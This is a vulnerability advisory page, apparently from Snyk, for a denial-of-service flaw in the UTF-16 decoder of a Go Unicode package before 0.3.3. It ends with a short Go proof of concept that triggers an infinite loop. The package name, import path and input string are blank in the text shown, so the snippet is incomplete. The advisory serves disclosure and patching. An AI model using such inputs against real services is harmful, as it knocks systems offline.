Denial of Service (DoS) Affecting package, versions <0.3.3

  • Exploit Maturity

    Proof of concept

  • Attack Complexity


  • Availability


Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications
  • snyk-id


  • published

    3 Sep 2020

  • disclosed

    9 Jun 2020

  • credit

    Evgeny Kapun

How to fix?

Upgrade to version 0.3.3 or higher.

Overview is an unicode package provides Unicode encodings such as UTF-16.

Affected versions of this package are vulnerable to Denial of Service (DoS). It is possible to exploit the UTF-16 decoder into entering an infinite loop, causing the program to crash or run out of memory.


package main

import ( "fmt" "" ) func main() { res, err := unicode.UTF16(unicode.BigEndian, unicode.UseBOM).NewDecoder().String(" ") fmt.Println(res, err) }